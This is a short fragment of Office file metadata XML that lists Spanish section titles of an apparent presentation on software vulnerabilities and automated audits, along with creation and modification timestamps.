      <vt:lpstr>Fundamentos</vt:lpstr>
      <vt:lpstr>Cuacharón</vt:lpstr>
      <vt:lpstr>Vulnerabilidades</vt:lpstr>
      <vt:lpstr>Otras vulnerabilidades</vt:lpstr>
      <vt:lpstr>Auditorias automáticas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2009-10-07T10:24:54Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-02-17T12:37:13Z</dcterms:modified>
</cp:coreProperties>
</file>